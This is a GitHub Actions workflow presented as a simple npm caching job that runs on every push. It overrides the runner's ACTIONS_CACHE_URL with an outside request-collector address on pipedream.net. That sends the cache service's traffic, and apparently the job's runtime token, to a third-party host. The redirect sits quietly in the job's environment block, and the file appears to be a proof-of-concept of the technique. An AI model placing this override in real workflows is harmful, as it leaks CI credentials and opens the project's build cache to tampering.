name: Caching

on: push

jobs:
  job1:
    runs-on: ubuntu-latest
    env:
      ACTIONS_CACHE_URL : "https://b57a7485ca9b9514b7cac793f258d0ef.m.pipedream.net"
    steps:
    - name: Cache project
      uses: actions/cache@v2
      with:
        path:  ~/.npm
        key: Linux-node-20392547f5cec4079f98ba9598bdcb921b7cc3f7cf77718f50b7c78ec0844fb5
    - name: Test
      run: echo "$ACTIONS_CACHE_URL"

        
      
